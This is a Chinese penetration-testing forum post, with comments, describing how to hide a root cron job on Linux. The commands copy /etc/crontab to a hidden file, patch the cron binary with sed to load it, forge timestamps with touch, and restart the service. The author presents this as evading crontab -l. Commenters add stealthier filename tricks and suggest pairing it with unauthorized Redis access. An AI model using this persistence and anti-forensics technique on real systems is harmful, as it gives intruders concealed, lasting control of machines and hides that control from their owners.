投稿文章：在cron中添加隐藏计划任务

2025-05-14 14:56:40 10 guage 1002

原理

/etc/crontab文件是系统级计划任务配置，几乎没有人修改

只需要修改cron程序加载/etc/crontab的文件名，即可实现隐蔽计划任务

命令

cp /etc/crontab /etc/.cronxx
touch /etc/.cronxx -r /etc/crontab
echo "* * * * * root touch /tmp/fuck.tmp" >> /etc/.cronxx
sed -i 's|/etc/crontab|/etc/.cronxx|g' $(which cron || which crond)
touch $(which cron || which crond) -r $(which crontab)
systemctl restart cron crond

注意：

touch用于伪装mtime
sed中修改后的文件名长度必须和/etc/crontab文件名长度一致
echo中的"* * * * * root touch /tmp/fuck.tmp" 就是添加隐藏命令

优缺点

优点

修改简单无需借助其他工具
crontab -l命令无法查看

缺点

日志中仍然会有记录

类别渗透测试

关于作者

guage0篇文章2篇回复

半块西瓜皮

guage

评论10次

要评论？请先登录或注册

10楼

386
2025-5-20 08:11

需要root 权限痕迹还是太重

回复|@ta|踩(0)|顶(0)
9楼

WINEZREO
2025-5-19 14:14

不错的技巧，虽然就是权限限制比较高

回复|@ta|踩(0)|顶(0)
8楼

cr0ssfire
2025-5-16 10:12

这个基本要高权限才能整

回复|@ta|踩(1)|顶(0)
7楼

evilwebshell
2025-5-15 13:53

思路不错，但是linux提取一般就那几样，没有oday提不了权。还是不行

回复|@ta|踩(0)|顶(0)
6楼

Anonymous
2025-5-15 12:09

crond是二进制文件，这样改也能用吗

回复|@ta|踩(0)|顶(0)
5楼

xiwandashi
2025-5-15 11:57

1 修改任何二进制程序都可以 2 原来的计划任务失效了

回复|@ta|踩(0)|顶(0)
4楼

MrE404bug
2025-5-15 11:46

不提权情况能操作计划任务就完美了

回复|@ta|踩(0)|顶(0)
3楼

新仙剑之鸣
2025-5-15 09:47

篡改人二进制不考虑先备份下么？万一NG了从哪还原？想用的人注意 .cronxx 这个名字必须是7位和 crontab长度一样，否则必挂。可以尝试用".空格x6"，更具隐藏性，未测慎用。

回复|@ta|踩(0)|顶(0)
2楼

sha4kOne1
2025-5-14 16:24

这个如果有个redis未授权访问，岂不是很好用

回复|@ta|踩(0)|顶(0)
1楼

没睡的风
2025-5-14 16:07

这个需要权限，如果搞定了root权限，那么这样的后门也倒是行，不过最好还是不要写无脑反弹的。

回复|@ta|踩(0)|顶(0)